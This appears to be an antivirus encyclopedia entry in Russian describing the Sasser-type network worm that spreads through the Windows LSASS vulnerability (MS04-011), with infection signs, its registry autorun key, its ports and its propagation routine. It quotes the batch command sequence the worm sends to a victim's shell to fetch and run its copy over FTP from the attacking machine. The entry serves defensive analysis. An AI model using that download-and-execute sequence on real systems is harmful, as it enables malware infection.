Родительский класс: VirWare
Вирусы и черви – это вредоносные программы, которые без ведома пользователя саморазмножаются на компьютерах или в компьютерных сетях, при этом каждая последующая копия также обладает способностью к саморазмножению. К вирусам и червям не относятся вредоносные программы, которые распространяют свои копии по сети и заражают удаленные машины по команде "хозяина" (например, программы типа Backdoor), или такие, которые создают в системе свои многочисленные, но не умеющие размножаться копии. Основным признаком, по которому программы выделяются в отдельные классы, является способ их распространения, т.е. как вредоносная программа передает свою копию по локальным или сетевым ресурсам. Большинство известных червей распространяется в виде файлов: во вложении в электронное письмо, при переходе по ссылке на каком-либо WEB- или FTP-ресурсе или по ссылке, присланной в ICQ- или IRC-сообщении, а также через системы файлового обмена P2P и т. п. Некоторые черви распространяются в виде сетевых пакетов, проникают непосредственно в память компьютера и активизируют свой код. Для проникновения на удаленные компьютеры и последующего запуска своей копии черви используют следующие проблемы в системах безопасности: социальный инжиниринг (например, в электронном письме предлагается открыть вложенный файл), недочеты в конфигурации сети (например, копирование на диск, открытый для полного доступа), ошибки в службах безопасности операционных систем и приложений. Что касается вирусов, то их можно разделить по способу заражения компьютера:- файловые;
- загрузочные;
- макровирусы;
- скриптовые.
Класс: Net-Worm
Размножаются в компьютерных сетях. Отличительной особенностью данного типа червей является то, что им не нужен пользователь в качестве звена в цепочке распространения (непосредственно для активации). Часто такой червь ищет в сети компьютеры, на которых используется программное обеспечение, содержащее критические уязвимости. Для заражения таких компьютеров червь посылает специально сформированный сетевой пакет (эксплойт), в результате чего код (или часть кода) червя проникает на компьютер-жертву и активируется. Иногда сетевой пакет содержит только ту часть кода червя, которая загружает файл с основным функционалом и запускает его на исполнение. Встречаются и сетевые черви, которые используют сразу несколько эксплойтов для своего распространения, что увеличивает скорость нахождения жертвы.Подробнее
Платформа: Win32
Win32 - платформа, управляемая операционной системой на базе Windows NT (Windows XP, Windows 7 и т.д.), позволяющей исполнять 32-битные приложения. В настоящее время данная платформа является одной из наиболее распространенных.Описание
Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011.
Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года.
Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.
Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.
Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.
Признаками заражения компьютера являются:
- Наличие файла "avserve.exe" в каталоге Windows.
- Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы.
Размножение
При запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "avserve.exe" = "%WINDIR%avserve.exe"
Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе.
Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы.
Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996.
После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела:
echo off echo open [адрес машины с которой производится атака] 5554>>cmd.ftp echo anonymous>>cmd.ftp echo user echo bin>>cmd.ftp echo get [произвольное число]_up.exe>>cmd.ftp echo bye>>cmd.ftp echo on ftp -s:cmd.ftp [произвольное число]_up.exe echo off del cmd.ftp echo on
Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например:
23101_up.exe 5409_up.exe
и т.д.
Прочее
После заражения инфицированная машина выводит сообщение об ошибке LSASS service failing, после чего может попытаться перезагрузиться.
Червь создает в корневом каталоге диска C: файл "win.log", который содержит IP-адреса атакуемых машин.
Смотрите также
Узнай статистику распространения уязвимостей в своем регионе statistics.securelist.com